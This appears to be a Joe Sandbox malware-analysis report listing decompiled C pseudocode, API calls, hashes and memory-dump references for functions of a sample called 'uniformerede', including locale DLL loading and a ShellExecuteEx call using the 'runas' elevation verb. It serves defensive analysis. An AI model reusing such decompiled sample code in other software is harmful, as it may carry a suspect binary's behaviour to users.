                                                                                                                                                                                                                            Function 004062DC Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 346 4062dc-40630d lstrcpyn GetThreadLocale GetLocaleInfoA 347 406313-406317 346->347 348 4063f6-4063fd 346->348 349 406323-406339 lstrlen 347->349 350 406319-40631d 347->350 351 40633c-40633f 349->351 350->348 350->349 352 406341-406349 351->352 353 40634b-406353 351->353 352->353 354 40633b 352->354 353->348 355 406359-40635e 353->355 354->351 356 406360-406386 lstrcpyn LoadLibraryExA 355->356 357 406388-40638a 355->357 356->357 357->348 358 40638c-406390 357->358 358->348 359 406392-4063c2 lstrcpyn LoadLibraryExA 358->359 359->348 360 4063c4-4063f4 lstrcpyn LoadLibraryExA 359->360 360->348
                                                                                                                                                                                                                            C-Code - Quality: 61%
                                                                                                                                                                                                                            			E004062DC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L0040131C();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401324();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L0040131C();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L0040131C();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L0040131C();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                                                                                                                                                                                                                            0x004062dc
                                                                                                                                                                                                                            0x004062e4
                                                                                                                                                                                                                            0x004062eb
                                                                                                                                                                                                                            0x004062ec
                                                                                                                                                                                                                            0x004062ff
                                                                                                                                                                                                                            0x00406304
                                                                                                                                                                                                                            0x0040630d
                                                                                                                                                                                                                            0x004063f6
                                                                                                                                                                                                                            0x004063fd
                                                                                                                                                                                                                            0x00406323
                                                                                                                                                                                                                            0x00406323
                                                                                                                                                                                                                            0x00406329
                                                                                                                                                                                                                            0x0040632a
                                                                                                                                                                                                                            0x00406337
                                                                                                                                                                                                                            0x0040633c
                                                                                                                                                                                                                            0x0040633f
                                                                                                                                                                                                                            0x0040633b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040633b
                                                                                                                                                                                                                            0x0040634b
                                                                                                                                                                                                                            0x00406353
                                                                                                                                                                                                                            0x00406359
                                                                                                                                                                                                                            0x0040635e
                                                                                                                                                                                                                            0x0040636b
                                                                                                                                                                                                                            0x0040636f
                                                                                                                                                                                                                            0x00406370
                                                                                                                                                                                                                            0x00406371
                                                                                                                                                                                                                            0x00406386
                                                                                                                                                                                                                            0x00406386
                                                                                                                                                                                                                            0x0040638a
                                                                                                                                                                                                                            0x004063a3
                                                                                                                                                                                                                            0x004063a7
                                                                                                                                                                                                                            0x004063a8
                                                                                                                                                                                                                            0x004063a9
                                                                                                                                                                                                                            0x004063b9
                                                                                                                                                                                                                            0x004063be
                                                                                                                                                                                                                            0x004063c2
                                                                                                                                                                                                                            0x004063c4
                                                                                                                                                                                                                            0x004063d9
                                                                                                                                                                                                                            0x004063dd
                                                                                                                                                                                                                            0x004063de
                                                                                                                                                                                                                            0x004063df
                                                                                                                                                                                                                            0x004063ef
                                                                                                                                                                                                                            0x004063f4
                                                                                                                                                                                                                            0x004063f4
                                                                                                                                                                                                                            0x004063c2
                                                                                                                                                                                                                            0x0040638a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406353

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                            • API String ID: 1599918012-2375825460
                                                                                                                                                                                                                            • Opcode ID: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                                                                                                                                                                                            • Instruction ID: b1d3fb610801afc069037103d2f87a16e6e0ad9f86a4084b42d9068a75e18736
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20319171E0025C6AFB26D6B89C46BDF7BAC8B44344F4501F7AA05F61C2E6788E848B94
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00473490 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67sleepsynchronizationCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                            			E00473490(intOrPtr __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __eflags, char _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				char* _t33;
				intOrPtr _t43;
				intOrPtr _t52;
				void* _t56;

				_v12 = __ecx;
				_v8 = __edx;
				_t43 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t56);
				_push(0x473564);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffbc;
				E004032B4( &_v72, 0x3c);
				_v72 = 0x3c;
				_v64 = _t43;
				_v68 = 0x440;
				_v56 = E00404E80(_v8);
				if(_a8 != 0) {
					_v60 = 0x473574;
				}
				if(_v12 != 0) {
					_v52 = E00404E80(_v12);
				}
				_v44 = 1;
				_t33 =  &_v72;
				_push(_t33); // executed
				L0042EC28(); // executed
				if(_t33 != 0) {
					if(_a4 != 0 && _v16 != 0) {
						while(WaitForSingleObject(_v16, 0x32) == 0x102) {
							Sleep(0x32);
						}
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(0x47356b);
				return E004049E4( &_v12, 2);
			}

















                                                                                                                                                                                                                            0x00473497
                                                                                                                                                                                                                            0x0047349a
                                                                                                                                                                                                                            0x0047349d
                                                                                                                                                                                                                            0x004734a2
                                                                                                                                                                                                                            0x004734aa
                                                                                                                                                                                                                            0x004734b1
                                                                                                                                                                                                                            0x004734b2
                                                                                                                                                                                                                            0x004734b7
                                                                                                                                                                                                                            0x004734ba
                                                                                                                                                                                                                            0x004734c7
                                                                                                                                                                                                                            0x004734cc
                                                                                                                                                                                                                            0x004734d3
                                                                                                                                                                                                                            0x004734d6
                                                                                                                                                                                                                            0x004734e5
                                                                                                                                                                                                                            0x004734ec
                                                                                                                                                                                                                            0x004734f3
                                                                                                                                                                                                                            0x004734f3
                                                                                                                                                                                                                            0x004734fa
                                                                                                                                                                                                                            0x00473504
                                                                                                                                                                                                                            0x00473504
                                                                                                                                                                                                                            0x00473507
                                                                                                                                                                                                                            0x0047350e
                                                                                                                                                                                                                            0x00473511
                                                                                                                                                                                                                            0x00473512
                                                                                                                                                                                                                            0x00473519
                                                                                                                                                                                                                            0x0047351f
                                                                                                                                                                                                                            0x00473530
                                                                                                                                                                                                                            0x0047352b
                                                                                                                                                                                                                            0x0047352b
                                                                                                                                                                                                                            0x00473530
                                                                                                                                                                                                                            0x00473542
                                                                                                                                                                                                                            0x0047354b
                                                                                                                                                                                                                            0x0047354e
                                                                                                                                                                                                                            0x00473551
                                                                                                                                                                                                                            0x00473563

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00473512
                                                                                                                                                                                                                            • Sleep.KERNEL32(00000032,00000000,00000032,00000000,00473564), ref: 0047352B
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000032,00000000,00473564), ref: 00473536
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExecuteObjectShellSingleSleepWait
                                                                                                                                                                                                                            • String ID: <$runas
                                                                                                                                                                                                                            • API String ID: 3175876650-1187129395
                                                                                                                                                                                                                            • Opcode ID: d2f4098c0599bc8fe6b33f95c7c42db526a5f4d83c62203c5c16265f54e5b256
                                                                                                                                                                                                                            • Instruction ID: 5aa402594196cc22e358d2c9fc2044dae5621586ffdb0388778a4eaf1ff726ef
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2f4098c0599bc8fe6b33f95c7c42db526a5f4d83c62203c5c16265f54e5b256
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC217FB0904208BBDB15DFAAD486BDEBBB8EB04304F50807BF508A6291D77C9B45DB49
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004099E0 Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004099E0(void* __eax) {
				short _v6;
				short _v8;
				struct _FILETIME _v16;
				struct _WIN32_FIND_DATAA _v336;
				void* _t16;

				_t16 = FindFirstFileA(E00404E80(__eax),  &_v336); // executed
				if(_t16 == 0xffffffff) {
					L3:
					_v8 = 0xffffffff;
				} else {
					FindClose(_t16);
					if((_v336.dwFileAttributes & 0x00000010) != 0) {
						goto L3;
					} else {
						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
							goto L3;
						}
					}
				}
				return _v8;
			}








                                                                                                                                                                                                                            0x004099fb
                                                                                                                                                                                                                            0x00409a03
                                                                                                                                                                                                                            0x00409a39
                                                                                                                                                                                                                            0x00409a39
                                                                                                                                                                                                                            0x00409a05
                                                                                                                                                                                                                            0x00409a06
                                                                                                                                                                                                                            0x00409a12
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00409a14
                                                                                                                                                                                                                            0x00409a1f
                                                                                                                                                                                                                            0x00409a37
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00409a37
                                                                                                                                                                                                                            0x00409a12
                                                                                                                                                                                                                            0x00409a47

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 004099FB
                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,00000000,?), ref: 00409A06
                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00409A1F
                                                                                                                                                                                                                            • FileTimeToDosDateTime.KERNEL32 ref: 00409A30
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2659516521-0
                                                                                                                                                                                                                            • Opcode ID: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                                                                                                                                                                                            • Instruction ID: bf488b194f2b476f169b407b0835a29ee4c7e870b59a6eb425f81542ff1916d2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CF01871D0024CA6CB11DAE58C85ACFB3AC5F04324F1047B7B519F21D2EA389F049B95
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043F118 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                            			E0043F118(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				void* __edi;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr* _t68;
				void* _t69;

				_t68 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t69 = _t17 - 0x84;
				if(_t69 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E0043B6EC(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						_t23 = E0043C1FC(_t50, _t68); // executed
						return _t23;
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E0043F084(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t68 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E00441A08(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t68 + 8)));
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_t32 = E00441704(_t50);
						_push(_t32);
						L00407540();
						return _t32;
					}
					goto L27;
				}
				if(_t69 == 0) {
					_t21 = E0043C1FC(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E00407A50( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E0043AAC0(_t50,  &_v28,  &_v20);
					_t21 = E0043EFF0(_t50, 0,  &_v28, _t65, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t68 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t66 = E004519E0(__eax);
					if(_t66 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t66 + 0xe8))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E00441704(__eax);
						if(_t45 == GetCapture() &&  *0x49bce0 != 0) {
							_t47 =  *0x49bce0; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x49bce0; // 0x0
								E0043C130(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}





















                                                                                                                                                                                                                            0x0043f11e
                                                                                                                                                                                                                            0x0043f120
                                                                                                                                                                                                                            0x0043f122
                                                                                                                                                                                                                            0x0043f124
                                                                                                                                                                                                                            0x0043f129
                                                                                                                                                                                                                            0x0043f148
                                                                                                                                                                                                                            0x0043f14b
                                                                                                                                                                                                                            0x0043f228
                                                                                                                                                                                                                            0x0043f22f
                                                                                                                                                                                                                            0x0043f27a
                                                                                                                                                                                                                            0x0043f27a
                                                                                                                                                                                                                            0x0043f27a
                                                                                                                                                                                                                            0x0043f26b
                                                                                                                                                                                                                            0x0043f26f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f26f
                                                                                                                                                                                                                            0x0043f159
                                                                                                                                                                                                                            0x0043f1f2
                                                                                                                                                                                                                            0x0043f1f9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f1ff
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f203
                                                                                                                                                                                                                            0x0043f20a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f20f
                                                                                                                                                                                                                            0x0043f213
                                                                                                                                                                                                                            0x0043f216
                                                                                                                                                                                                                            0x0043f219
                                                                                                                                                                                                                            0x0043f21e
                                                                                                                                                                                                                            0x0043f21f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f21f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f15f
                                                                                                                                                                                                                            0x0043f12b
                                                                                                                                                                                                                            0x0043f1a1
                                                                                                                                                                                                                            0x0043f1aa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f1b9
                                                                                                                                                                                                                            0x0043f1c8
                                                                                                                                                                                                                            0x0043f1d5
                                                                                                                                                                                                                            0x0043f1dc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f1e2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f1e2
                                                                                                                                                                                                                            0x0043f12d
                                                                                                                                                                                                                            0x0043f130
                                                                                                                                                                                                                            0x0043f16b
                                                                                                                                                                                                                            0x0043f16f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f17b
                                                                                                                                                                                                                            0x0043f183
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f189
                                                                                                                                                                                                                            0x0043f132
                                                                                                                                                                                                                            0x0043f133
                                                                                                                                                                                                                            0x0043f192
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f135
                                                                                                                                                                                                                            0x0043f138
                                                                                                                                                                                                                            0x0043f235
                                                                                                                                                                                                                            0x0043f243
                                                                                                                                                                                                                            0x0043f24e
                                                                                                                                                                                                                            0x0043f256
                                                                                                                                                                                                                            0x0043f261
                                                                                                                                                                                                                            0x0043f266
                                                                                                                                                                                                                            0x0043f266
                                                                                                                                                                                                                            0x0043f256
                                                                                                                                                                                                                            0x0043f243
                                                                                                                                                                                                                            0x0043f138

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Capture
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1145282425-3916222277
                                                                                                                                                                                                                            • Opcode ID: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                                                                                                                                                                                            • Instruction ID: 937a996b5d7fc64cee9df4cbb2c234063ab2d53f9f2184138994f8e7c5ea39be
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6331A235A04A00C7DA20AA6DC985B1B2284AB4D358F14667FB486C7393CA7ECC0D874D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00446564 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E00446564(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x4465ea);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x49eb20 =  *0x49eb20 - 1;
				if( *0x49eb20 < 0) {
					 *0x49eb1c = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x49eb1c;
					E00446330(_t16, __edi,  *0x49eb1c);
					_t6 =  *0x436dd0; // 0x436e1c
					E0041A4A8(_t6, _t16, _t17,  *0x49eb1c);
					_t8 =  *0x436dd0; // 0x436e1c
					E0041A548(_t8, _t16, _t17, _t31);
					_t21 =  *0x436dd0; // 0x436e1c
					_t10 =  *0x447948; // 0x447994
					E0041A4F4(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x436dd0; // 0x436e1c
					_t12 =  *0x4465f4; // 0x446640
					E0041A4F4(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x436dd0; // 0x436e1c
					_t14 =  *0x44675c; // 0x4467a8
					E0041A4F4(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x4465f1);
				return 0;
			}















                                                                                                                                                                                                                            0x00446564
                                                                                                                                                                                                                            0x00446564
                                                                                                                                                                                                                            0x00446569
                                                                                                                                                                                                                            0x0044656a
                                                                                                                                                                                                                            0x0044656f
                                                                                                                                                                                                                            0x00446572
                                                                                                                                                                                                                            0x00446575
                                                                                                                                                                                                                            0x0044657c
                                                                                                                                                                                                                            0x0044658c
                                                                                                                                                                                                                            0x0044658c
                                                                                                                                                                                                                            0x00446593
                                                                                                                                                                                                                            0x00446598
                                                                                                                                                                                                                            0x0044659d
                                                                                                                                                                                                                            0x004465a2
                                                                                                                                                                                                                            0x004465a7
                                                                                                                                                                                                                            0x004465ac
                                                                                                                                                                                                                            0x004465b2
                                                                                                                                                                                                                            0x004465b7
                                                                                                                                                                                                                            0x004465bc
                                                                                                                                                                                                                            0x004465c2
                                                                                                                                                                                                                            0x004465c7
                                                                                                                                                                                                                            0x004465cc
                                                                                                                                                                                                                            0x004465d2
                                                                                                                                                                                                                            0x004465d7
                                                                                                                                                                                                                            0x004465d7
                                                                                                                                                                                                                            0x004465de
                                                                                                                                                                                                                            0x004465e1
                                                                                                                                                                                                                            0x004465e4
                                                                                                                                                                                                                            0x004465e9

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetVersion.KERNEL32(00000000,004465EA), ref: 0044657E
                                                                                                                                                                                                                              • Part of subcall function 00446330: GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                                                                                                                                                                                              • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 00446384
                                                                                                                                                                                                                              • Part of subcall function 00446330: GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                                                                                                                                                                                              • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                                                                                                                                                                                              • Part of subcall function 00446330: RegisterClipboardFormatA.USER32 ref: 004463EB
                                                                                                                                                                                                                              • Part of subcall function 00446330: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                                                                                                                                                                                              • Part of subcall function 00446330: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
